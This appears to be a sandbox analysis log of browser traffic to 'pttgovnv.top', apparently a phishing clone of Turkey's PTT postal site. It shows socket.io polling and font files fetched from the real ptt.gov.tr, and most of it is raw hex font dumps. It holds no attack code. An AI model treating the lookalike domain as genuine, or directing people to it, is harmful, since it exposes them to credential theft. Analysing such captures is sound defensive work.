          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          129192.168.2.449875104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC380OUTGET /socket.io/?EIO=4&transport=polling&t=P6liODe HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:35 UTC619INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:35 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 118
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLCwMxtLHgvDH6cefoS43RRWiqffcxTYy6f0SElA0Mc3OKYFKoHX7Z0ttSCxZMDTFLcKTFd6oNUVsnM%2F%2FcS7WC4ae9EaUzXXa0hLQXpYSJTc9Lj61oaw9Lm4Ii0F6lU%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad528fde42dd-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:35 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 70 73 65 43 32 45 44 51 30 32 2d 4d 54 49 56 58 42 51 55 4f 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
          Data Ascii: 0{"sid":"pseC2EDQ02-MTIVXBQUO","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          130192.168.2.449874172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P6liOSJ&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:35 UTC616INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:35 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 32
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rwzqFCqyh8LA0VRwHPqLPBcuwEMOWjUc5yVV6qNFcMyd9tIsiVn8m2WJL4auC3vwsPwRQ8AC7DmGlqhHQ5mHJ5trMrFuXm7Jlftb2YFfVrxQTC8K0cXAerP7ECrc%2Bw8%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad528da018d0-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:35 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 6e 77 4b 66 54 56 6b 6c 33 41 49 4e 61 76 34 5a 42 51 55 50 22 7d
          Data Ascii: 40{"sid":"nwKfTVkl3AINav4ZBQUP"}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          131192.168.2.449876185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC621OUTGET /_next/static/media/OmnesRegular.2b095194.otf HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://www.ptt.gov.tr
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: font
          Referer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.css
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:35 UTC372INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: font/otf
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"1b394-19178e938a0"
          Vary: Accept-Encoding
          Date: Sun, 01 Sep 2024 22:25:35 GMT
          Content-Length: 111508
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:35 UTC6899INData Raw: 4f 54 54 4f 00 0d 00 80 00 03 00 50 43 46 46 20 18 40 75 bf 00 00 08 f0 00 00 89 ed 44 53 49 47 00 00 00 01 00 01 ac 80 00 00 00 08 47 44 45 46 07 ca 07 c2 00 00 92 e0 00 00 00 3a 47 50 4f 53 dc db 63 5a 00 00 93 1c 00 00 ea 9e 47 53 55 42 b2 5f 57 ea 00 01 7d bc 00 00 25 3e 4f 53 2f 32 63 7b 6b c1 00 00 08 64 00 00 00 60 63 6d 61 70 81 aa 9e 48 00 01 ac 88 00 00 07 0c 68 65 61 64 10 a4 3f 1a 00 00 00 dc 00 00 00 36 68 68 65 61 07 60 04 c7 00 00 08 c4 00 00 00 24 68 6d 74 78 68 11 46 ac 00 01 a2 fc 00 00 09 64 6d 61 78 70 02 59 50 00 00 00 08 e8 00 00 00 06 6e 61 6d 65 58 3b 39 69 00 00 01 14 00 00 07 50 70 6f 73 74 ff c2 00 46 00 01 ac 60 00 00 00 20 00 01 00 00 00 01 01 06 ee e2 ea 64 5f 0f 3c f5 00 03 03 e8 00 00 00 00 d6 eb 06 5f 00 00 00 00 d6 fa f3
          Data Ascii: OTTOPCFF @uDSIGGDEF:GPOScZGSUB_W}%>OS/2c{kd`cmapHhead?6hhea`$hmtxhFdmaxpYPnameX;9iPpostF` d_<_
          2024-09-01 22:25:36 UTC7271INData Raw: 08 0b 15 fb 26 ed 26 f7 25 d5 c2 a4 a5 a9 1e a5 a0 97 a2 9a 1a ab 66 93 87 89 1e 5d 73 61 61 32 1b 2b 46 cb eb 82 1f 8a 90 8b 90 8f 1a f7 fd 06 9d 92 91 9c 1f 92 07 f7 21 35 e9 fb 19 fb 1d 28 20 fb 25 1e f8 14 b2 15 fb cd 06 6f 1d e2 1b e2 c4 4d 2e 8f 1f 0b 15 82 06 79 a8 1d fb bd 07 51 71 57 64 46 1b 3a 5e c4 e7 1f f7 89 07 a5 3f 0a a8 1d fb 8e 07 fb 0f c7 36 f7 0f d8 c2 b3 c0 ab 1e 7e 8c 7e 8c 7e 1e 66 8f 9d 81 9f 1b 99 97 91 8d 1f f8 4f 74 0a 0e 15 fb 26 ed 26 f7 25 d5 c1 a4 a5 aa 1e a4 a0 98 a2 9a 1a ab 66 93 87 89 1e 5d 73 61 61 32 1b 2b 46 cb eb 82 1f 90 8a 37 0a 15 f7 2c e3 c1 e4 d8 42 ac 45 9d 1f 3c 9f 5c 8f 89 ac 8a 95 8d 94 94 92 08 8a 94 93 8b 94 1b f7 05 dc d5 ec b4 7a b0 72 a7 1f d8 de 8d 90 7e a3 74 8d 19 7a 8d 7c 85 7d 73 67 57 18 a1 6b 63
          Data Ascii: &&%f]saa2+F!5( %oM.yQqWdF:^?6~~~fOt&&%f]saa2+F7,BE<\zr~tz|}sgWkc
          2024-09-01 22:25:36 UTC7271INData Raw: 7b 80 1d 98 84 a0 1e ac fc 45 06 67 0a b6 f7 f9 15 f7 02 f8 05 fb 02 07 0e ed f7 72 2b 1d fb 09 fd 4f 5e 1d fb db de aa 3a 0a 0e f7 07 de aa 3a 0a f7 48 fc a1 41 1d 0e f7 07 c9 f9 53 15 95 f7 3f d1 86 0a 98 78 51 27 fb 24 81 88 8d 8a 92 1f f8 61 16 96 f7 3f d1 c4 9d 7d 98 79 50 28 fb 24 81 88 8c 8a 92 1f fc 4c fd 34 3a 0a f7 48 fc a1 41 1d 0e fb db c9 34 1d a0 fd 34 3a 0a 0e fb db f7 0c 87 0a 3d 0a 66 fd 2d 3a 0a 0e fb db 95 2b 1d d4 fd 2d 3a 0a 0e fb db a9 38 1d fb 13 fd 38 3a 0a 0e fb db f7 0c 52 1d 66 fd 38 3a 0a 0e fb db f7 43 f9 52 49 1d 2f fd 33 3a 0a 0e fb db 99 42 0a d0 fd 46 3a 0a 0e fb db ed fb 5b 15 b4 aa a4 0a 7d 8c 1f 7d 83 7e 85 7a 1b 75 7b 9b a3 a8 a2 ac c6 b7 1f 92 90 8f 94 98 1a f8 dd 07 a2 7f 96 76 1e ab 0a fc dd 07 7e 8e 81 94 86 1e 4f
          Data Ascii: {Egr+O^::HAS?xQ'$a?}yP($L4:HA44:=f-:+-:88:Rf8:CRI/3:BF:[}}~zu{v~O
          2024-09-01 22:25:36 UTC7271INData Raw: 96 74 1b 72 7d 74 87 8d 1f f7 35 fb 6b 05 0e 28 f7 45 fb 54 32 1d 0e 28 f7 39 31 0a 97 fd 79 32 1d 0e 28 f7 15 71 0a 2d 1d bb fd 79 32 1d 0e 28 f7 29 33 0a fb 22 fd 9a 32 1d 0e 28 f7 c3 45 0a fb 12 fd 79 32 1d 0e 20 ae a8 44 1d 20 f7 36 31 0a fb 13 fc 9c 44 1d 20 f7 7b f8 b4 15 44 0a fb 58 fc 97 44 1d 20 f7 7b f8 da 15 4a 0a fb 58 fc bd 44 1d 20 f7 72 fb 66 25 1d 4f 0a 88 f7 92 80 22 0a 88 f7 5b 31 0a c2 fc c4 22 0a 88 f7 a0 f8 b5 15 3e 1d 7d fc c0 22 0a 88 f7 37 71 0a 2d 1d e6 fc c4 22 0a 88 f7 4b 33 0a 28 fc e5 22 0a 88 f7 e5 45 0a 38 fc c4 22 0a 88 f7 3f 42 1d de fc f0 22 0a 88 f8 73 fb 0f 15 7d 83 7d 85 7a 1b 76 7b 9b a2 a7 a0 ab c5 b6 1f 96 8f 92 94 9d 1a f8 4f 07 8d 7e 91 7e 78 79 81 68 87 1e 89 7d 8a 7e 8a 7b 08 be 72 4d b7 35 4e 0a de c4 b3 c7 ad
          Data Ascii: tr}t5k(ET2(91y2(q-y2()3"2(Ey2 D 61D {DXD {JXD rf%O"[1">}"7q-"K3("E8"?B"s}}zv{O~~xyh}~{rM5N
          2024-09-01 22:25:36 UTC7271INData Raw: 1e fb 20 06 f7 50 f7 c3 05 91 8f 78 a5 6f 1b 7e 7d 83 77 80 1f fb 36 fb ad fb 34 f7 ae 05 9e 82 7d 93 7c 1b 6d 77 71 85 8e 1f f7 51 fb c3 05 fb 20 06 75 83 82 7c 1f 84 07 7b 93 83 a1 1e f7 35 35 fb 35 06 75 83 82 7c 1f 83 07 7c 93 82 a1 1e f7 35 33 06 74 94 7f a0 1e 0e a3 f8 7a f7 54 15 74 53 5d 64 46 86 08 f8 10 07 d0 84 b3 68 a3 58 08 8e 87 b2 97 aa 1a 9a 7c a6 6f a1 1e 6d a3 60 a2 53 90 08 e5 07 a5 7f 94 77 1e 88 06 78 7f 6b 1d 2f 07 fb 11 7b 34 28 fb 1c 1a fb 21 de 2e f7 15 7c 1e 2b 07 72 97 82 9d 1e 8f 06 9f 97 94 a4 1f e9 07 c3 90 b6 a0 a7 a5 08 ac a5 9d a8 9e 1a ac 63 92 88 87 1e fb e9 e4 15 f7 00 c4 d0 e1 99 1e fc 0e 07 35 9b 52 cf f2 1a 0e a3 f8 a3 f7 42 15 f7 0c 27 af 29 a5 1e f7 7e 07 d6 82 bd 64 a2 60 08 8d 89 ac 9b a7 1a a1 75 aa 62 a2 1e 6e
          Data Ascii: Pxo~}w64}|mwqQ u|{555u||53tzTtS]dFhX|om`Swxk/{4(!.|+rc5RB')~d`ubn
          2024-09-01 22:25:36 UTC7271INData Raw: 2a fb 01 fb 22 1e 0e 15 99 9c 90 97 94 1a 9f 6f 96 88 88 1e 4a 42 05 a9 64 59 9c 52 1b fb 23 27 23 fb 25 47 a1 50 b0 60 1f 66 62 05 7d 7b 86 7f 81 1a 77 a7 7f 8f 8f 1e cb d2 05 6f b1 bc 7b c4 1b f7 21 ef f3 f7 24 ce 76 c5 67 b5 1f fb 4c a3 15 b5 af 7e 73 a8 1f fb 87 fb a3 05 73 ab 7d b4 b9 1a f7 03 d4 d9 f0 1e fc 10 04 62 67 98 a2 6f 1f f7 85 f7 a2 05 a2 6b 98 63 5e 1a fb 02 43 3c 27 1e 0e 1b fb 14 2d 26 fb 28 fb 2a e9 27 f7 12 0b 82 f7 f4 f8 10 15 f7 20 f7 50 05 aa a1 8c bb 4d 1b fb 33 06 fb 25 3a fb 01 fb 32 1f fb f1 07 75 94 7f a1 1e 94 06 9f 97 97 a1 1f f7 f7 07 f3 c1 eb ee 1e f7 19 06 fb 13 fb 3b 05 89 88 76 73 77 1a 73 97 80 aa 80 1e ea 69 c2 6e 39 1a 44 6c 50 33 57 63 a1 b5 78 1e 7e 8a 79 79 76 1a 77 9a 75 a6 79 1e 79 a5 b5 83 b3 1b f7 01 d6 d1 f7
          Data Ascii: *"oJBdYR#'#%GP`fb}{wo{!$vgL~ss}bgokc^C<'-&(*' PM3%:2u;vswsin9DlP3Wcx~yyvwuyy
          2024-09-01 22:25:36 UTC7271INData Raw: 01 76 00 02 01 7a ff ff 01 7b 00 01 01 c9 ff ff 01 cb 00 01 01 cc ff fc 01 cf 00 01 01 d3 ff ff 01 d4 00 02 01 d5 ff fe 01 d6 00 02 01 d8 00 02 01 e4 00 02 02 1d ff ff 00 07 01 88 ff e2 01 89 ff f2 01 8a ff eb 01 8e ff da 01 c2 ff ec 01 ec ff d8 01 ed ff d1 00 02 01 79 ff f5 01 eb ff d8 00 01 01 eb ff d7 00 04 01 a6 ff ef 01 ac ff e4 01 ef ff e0 01 f0 ff d4 00 05 01 a6 ff ff 01 a9 ff f6 01 ac ff fe 01 ee ff e0 01 f0 ff ff 00 02 01 ee ff de 01 ef ff ff 00 07 01 cb ff ed 01 d1 ff ff 01 d2 ff e8 01 d4 ff e9 01 d5 ff e5 01 d6 ff e9 01 d8 ff eb 00 07 01 cb ff ed 01 d1 ff ff 01 d2 ff e8 01 d4 ff e9 01 d5 ff e5 01 d6 ff e9 01 d8 ff eb 00 07 01 cb ff ed 01 d1 ff ff 01 d2 ff e8 01 d4 ff e9 01 d5 ff e5 01 d6 ff e9 01 d8 ff eb 00 07 01 cb ff ed 01 d1 ff ff 01 d2 ff
          Data Ascii: vz{y
          2024-09-01 22:25:36 UTC7271INData Raw: b6 ff fe 00 b7 ff fe 00 b8 ff fe 00 b9 ff fe 00 ba ff fe 00 bc ff fe 00 bd ff fe 00 be ff fe 00 bf ff fe 00 c0 ff fe 00 c1 ff fe 00 c2 ff fe 00 c3 ff e0 00 c4 ff fe 00 c5 ff fe 00 c6 ff fe 00 c7 ff fe 00 c8 ff fe 00 c9 ff fe 00 ca ff fe 00 cb ff fe 00 cc ff fe 00 cd ff fe 00 ce ff fe 00 cf ff fe 00 d0 ff d9 00 d2 ff fe 00 d3 ff fe 00 d4 ff fe 00 d5 ff fe 00 d6 ff fe 00 d8 00 09 00 db ff e0 00 dd 00 25 00 de 00 1d 00 df 00 24 00 e1 00 01 00 e4 00 32 00 e6 00 2c 00 e8 ff e0 00 ea 00 15 00 f3 ff f6 00 f4 ff ff 00 f5 ff ff 00 f6 ff ff 00 f7 ff ff 00 f8 ff ff 00 f9 ff ff 00 fa ff ff 00 fb ff fe 00 fc ff fe 00 fd ff fe 00 fe ff fe 00 ff ff fe 01 00 ff fe 01 01 ff fe 01 02 ff fe 01 03 ff fe 01 04 ff fe 01 05 ff fe 01 06 ff fe 01 07 ff ff 01 09 ff fe 01 0a ff ff
          Data Ascii: %$2,
          2024-09-01 22:25:36 UTC7271INData Raw: 01 d1 ff f4 01 e4 00 01 02 1d ff ff 02 23 00 01 00 f5 00 01 ff fd 00 02 ff fd 00 03 ff fd 00 04 ff fd 00 05 ff fd 00 06 ff fd 00 07 ff fd 00 08 ff fd 00 09 ff fd 00 0a ff fd 00 0b ff fd 00 0c ff fd 00 0d ff fd 00 0f ff ff 00 10 ff ff 00 11 ff ff 00 12 ff ff 00 13 ff ff 00 14 ff ff 00 24 ff ff 00 25 ff ff 00 26 ff ff 00 27 ff ff 00 28 ff ff 00 38 ff fb 00 39 ff fb 00 3a ff fb 00 4a ff ff 00 4b ff ff 00 4c ff ff 00 4d ff ff 00 4e ff ff 00 4f ff ff 00 50 ff ff 00 51 ff ff 00 52 ff ff 00 53 ff ff 00 54 ff ff 00 55 ff ff 00 58 ff ff 00 5d ff ff 00 5e ff ff 00 5f ff ff 00 60 ff ff 00 61 ff ff 00 62 ff ff 00 63 ff f2 00 64 ff f3 00 85 ff fd 00 86 ff fd 00 8a ff ff 00 8b ff ff 00 8c ff ff 00 8d ff ff 00 8e ff ff 00 ae ff fe 00 af ff fe 00 b0 ff fe 00 b1 ff fe 00
          Data Ascii: #$%&'(89:JKLMNOPQRSTUX]^_`abcd
          2024-09-01 22:25:36 UTC7271INData Raw: cd ff fe 01 cf 00 02 01 d1 ff fc 01 e4 00 02 02 1d ff db 02 23 00 0b 00 13 00 c3 ff eb 00 d0 ff ff 00 d8 00 02 00 de 00 02 00 df 00 03 00 e4 00 01 00 e6 00 02 00 ea 00 01 01 5c 00 01 01 73 ff e4 01 7a ff e9 01 c9 ff ff 01 cb 00 02 01 cd ff fe 01 cf 00 02 01 d1 ff fc 01 e4 00 02 02 1d ff db 02 23 00 0b 00 13 00 c3 ff eb 00 d0 ff ff 00 d8 00 02 00 de 00 02 00 df 00 03 00 e4 00 01 00 e6 00 02 00 ea 00 01 01 5c 00 01 01 73 ff e4 01 7a ff e9 01 c9 ff ff 01 cb 00 02 01 cd ff fe 01 cf 00 02 01 d1 ff fc 01 e4 00 02 02 1d ff db 02 23 00 0b 00 0a 00 73 ff e0 01 2c ff f9 01 cb ff ef 01 cf ff f1 01 d2 ff ee 01 d4 ff ea 01 d6 ff ea 01 d8 ff eb 01 e4 ff fe 02 23 ff e6 00 0a 00 73 ff e0 01 2c ff f9 01 cb ff ef 01 cf ff f1 01 d2 ff ee 01 d4 ff ea 01 d6 ff ea 01 d8 ff eb
          Data Ascii: #\sz#\sz#s,#s,


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          132192.168.2.449877185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC623OUTGET /_next/static/media/fa-solid-900.ce4938a3.woff2 HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://www.ptt.gov.tr
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: font
          Referer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.css
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC351INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: font/woff2
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"26350-19178e938a0"
          Date: Sun, 01 Sep 2024 22:25:35 GMT
          Content-Length: 156496
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:36 UTC6920INData Raw: 77 4f 46 32 00 01 00 00 00 02 63 50 00 0a 00 00 00 06 1a 05 00 02 63 04 03 05 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 ab 3c 00 81 91 02 ca 96 c2 20 cb ab 40 05 87 6d 07 20 25 02 0d 93 d6 01 d0 1a 56 27 00 00 aa bf 8d 87 11 29 9a 3d 3c 45 e4 ac d7 03 a0 aa aa aa aa aa a6 25 04 1c d7 b6 bd aa 0a 00 08 7e f4 93 9f fd e2 57 bf f9 dd 1f fe e4 cf fe e2 af fe e6 ef fe e1 9f fe e5 df fe e3 bf fe e7 ff fe 53 60 30 ee fe 81 30 2d db 71 b9 3d 5e 9f df f0 2f 3f f6 7a 6e 0a 44 6f 2c 1c 70 46 a4 d0 81 42 f2 19 38 54 72 aa fe f9 1a 35 a1 db 6e fb 18 ff 51 97 3e cb be 00 a0 74 3a bf 9f 94 51 c5 09 98 53 e4 1d 01 d6 74 eb d8 ac 65 56 19 8d fc 9f 8a 29 e5 60 a2 49 67 62 22 ad b6 a8 98 bf dc 22 5a 49 32 7d 01 2c b2 83 aa
          Data Ascii: wOF2cPc6$ `< @m %V')=<E%~WS`00-q=^/?znDo,pFB8Tr5nQ>t:QSteV)`Igb""ZI2},
          2024-09-01 22:25:36 UTC7271INData Raw: f1 10 34 0f e2 61 68 16 c4 23 d0 7c 88 47 a1 d9 10 8f 41 0b 20 1e 87 16 42 3c 01 ed 00 f1 a4 84 fc 05 a1 45 10 6f 43 1f 42 bc 03 3f 11 e2 23 29 97 f9 c7 22 7d 07 f1 09 d2 1a 88 7f a1 1c 62 3e d2 27 10 0b e0 7f 40 ac 45 d6 1d 62 03 d2 57 10 9b 6b 5f 78 69 b9 61 01 a8 25 6f 84 7b 52 a1 78 9e 82 98 67 42 67 40 51 1b ea 0e 45 1d a4 df a1 a8 0b cf a0 a8 07 af 03 45 43 f8 04 28 1a 23 ed 0f 45 13 a4 fd a0 68 0a bb 0e 8a 66 62 de 5c d8 f5 50 b4 10 f3 f6 22 3d 04 45 19 e9 43 28 7a 83 0c 8a 71 f0 21 e8 21 dd e5 c4 7c 15 65 bb f9 6a a2 b3 00 dd b5 61 1c dd 75 24 e4 eb 3a ff 7f ee d5 dd f5 95 90 6f 23 d2 89 74 cf 85 01 74 cf 43 fa 98 ee f9 e8 7c c1 8c f3 a0 b3 39 33 ce 8b ce 66 cc 3c 1c 9d 35 99 79 12 74 8e 66 e6 49 c5 7c 5a 91 d7 62 e6 35 46 48 27 51 f5 a7 1a 80 39
          Data Ascii: 4ah#|GA B<EoCB?#)"}b>'@EbWk_xia%o{RxgBg@QEEC(#Ehfb\P"=EC(zq!!|ejau$:o#ttC|93f<5ytfI|Zb5FH'Q9
          2024-09-01 22:25:36 UTC7271INData Raw: fe fb 06 32 ed d5 e5 f6 ff 08 13 78 1b da fc b2 04 4c 34 a6 36 ce 13 95 70 dd 8d 59 26 81 5c 67 53 9a c9 c5 f7 96 87 c1 af ba e1 e2 b7 60 2b 8c c3 27 ca 73 25 9c 5d fc ed f5 97 4c 94 d7 87 c3 8c 0b d7 46 19 ed ae 80 8f 61 ad 66 c4 8f d4 2e 91 44 de 0a fc f5 ac f4 7c a7 d7 53 59 a6 7a bd 9d a5 c3 9f c3 da fa 70 74 fa f4 68 b8 be 06 1f 87 1c 65 aa 57 6c 6f 17 c7 55 be cd 66 7a 76 30 68 af af b7 07 83 b3 af c6 68 b7 17 9a a2 36 3a 8e 13 8e 11 4d 1e d4 73 46 7a 90 0f 64 7b 9a 41 45 62 93 a4 47 39 b7 6a 7c 74 74 94 d9 e9 11 50 24 ed 28 29 c3 c1 f9 ac 38 aa b3 38 2d f8 22 fc ba 1e 5b 31 46 a8 f6 87 1f a5 ab 5a dd ba 53 f0 62 2e 71 89 d3 2c 37 69 97 68 d3 32 bf 4d 39 c6 7b 7b 87 bb f9 25 0f 20 f0 39 a7 f7 69 df c4 b3 a0 39 3a fc e9 1d 74 31 1e f5 f7 cf 8e cf da
          Data Ascii: 2xL46pY&\gS`+'s%]LFaf.D|SYzptheWloUfzv0hh6:MsFzd{AEbG9j|ttP$()88-"[1FZSb.q,7ih2M9{{% 9i9:t1
          2024-09-01 22:25:36 UTC7271INData Raw: cd 1c 4b 58 06 56 ff 64 b1 21 24 34 29 29 1c d3 41 12 41 b2 a5 ba 5d 9b 9f 53 75 5d bd e3 09 57 48 0f 0b fa 9e be d2 bd e5 1e fb cf 77 e5 67 28 bd f3 9d f3 75 75 48 e9 9d 4f 6b 46 58 fb a5 c1 78 cf 75 f2 8b ac a4 2a 21 94 b9 2a 6c 94 7c b5 3a d9 7e 89 c1 d2 c6 8f 08 b7 15 47 4c a3 6b 10 72 32 8a b8 1f c8 67 39 83 b6 2d 95 13 ec 34 2b e2 e6 d4 2e 74 e2 e8 a8 9a fe 4b d5 75 75 f0 f4 c1 91 66 9a 25 0e cb 83 af 16 45 00 8e a8 5d 27 fd cf 19 f8 2a a5 03 c7 b3 7c f4 95 79 e5 57 8e 1e c7 e8 60 fc dc c2 0a 31 10 82 22 4f b2 d6 8b fe 53 cd 8c fa d5 e8 7a f4 ea 7c c8 48 66 43 c2 9f f7 96 f4 22 eb d0 38 56 8f ef 7d 10 28 d4 5c 91 a4 51 1a 24 51 92 8d a9 e7 29 6b d7 ed 4b 59 4f 77 6a bd 82 a7 5d 53 f6 0b 7b 5c 49 f5 5d bf dc 75 87 71 9e e7 61 78 dd b9 73 e7 f4 4d 5d
          Data Ascii: KXVd!$4))AA]Su]WHwg(uuHOkFXxu*!*l|:~GLkr2g9-4+.tKuuf%E]'*|yW`1"OSz|HfC"8V}(\Q$Q)kKYOwj]S{\I]uqaxsM]
          2024-09-01 22:25:36 UTC7271INData Raw: f6 3e e7 33 1c e7 9b e6 70 ab 67 3c d8 21 3f 68 6c 3e 3a 28 87 cc 2b 77 1f 75 14 50 fe cf 1a 60 3c 1d 51 e6 9d 44 61 cc ef 46 04 23 54 42 a7 e5 de e7 bd 03 bd 0f 21 69 74 0e 1f 05 a0 8d 41 98 d9 0b fc 20 8e 83 98 14 83 d2 5f ce 92 ff 72 9b ab f8 b7 19 5f 71 0d 52 2d e5 38 43 9d a1 d1 8f 3a 7f 20 10 e6 d8 05 99 44 65 95 64 2c e1 57 13 f8 04 d0 a1 9d 3b 27 1b 8d c9 9d 3b 0f 6d fd 7a 59 8c e3 58 55 4d ae eb 44 24 92 64 46 82 20 69 8e c3 24 41 d2 09 13 64 22 a8 22 b1 29 d5 74 4f 67 45 51 d8 eb fb 3e 11 05 56 a5 64 96 01 66 b1 67 94 c0 30 05 5a 0e 6a c0 57 15 45 11 39 97 15 41 e7 b2 1b 86 21 63 aa fa e2 ce 72 a8 37 76 ed de bf 7f f7 ae 46 1d b6 7f f5 7f 49 d7 75 51 14 25 59 d2 65 d3 34 14 0b 0b 84 03 70 59 02 ac 1a 22 29 31 1a 30 83 6b 86 45 4c 8c 7f 3f 08 02
          Data Ascii: >3pg<!?hl>:(+wuP`<QDaF#TB!itA _r_qR-8C: Ded,W;';mzYXUMD$dF i$Ad"")tOgEQ>Vdfg0ZjWE9A!cr7vFIuQ%Ye4pY")10kEL?
          2024-09-01 22:25:36 UTC7271INData Raw: 53 31 40 19 ae 15 d8 f0 0a db 12 7e c7 d0 02 ff a4 a6 cd 2e 54 aa 12 e3 e0 38 5f bd f1 3f eb fa 27 2e 96 6d 1b 16 f7 2a d4 15 62 be af 9f d3 2e 18 57 c3 be 8b 56 d1 3a 7a 35 42 d0 5d 8b 26 f9 97 45 7a 8e 51 f4 a4 51 c4 b7 1c e9 66 5b e3 e9 52 3a 5a 3a af 03 49 92 d4 95 4a 21 c6 4e aa b0 81 33 28 c5 bc fd 57 08 fe 5d 73 6c f2 84 20 dc 64 eb 4c bf e6 30 2b 14 c2 b0 50 50 7b c7 0d a2 3a 37 49 d2 1e 85 1b e6 ad 00 80 75 d1 75 45 fd 57 c7 c7 61 a4 96 28 2a 37 23 e1 d6 e4 e3 07 ec cb a6 c2 dc f1 6f 09 62 a6 70 cb b8 a6 62 d9 b6 55 59 d6 1c 53 ac 4a f2 ed 96 ae 69 eb f0 5e 17 63 f7 3d 50 1c 1f ab 8d 25 18 2d 45 82 d6 23 41 b8 6b d2 5f e9 8a 1c 66 f0 a4 ae 46 bc 14 f8 1e 14 97 7d b2 8a 0c 38 37 49 3d f9 78 bd 5e 17 24 1c 21 09 a8 3c 27 1a 16 08 04 e7 41 c8 55 29
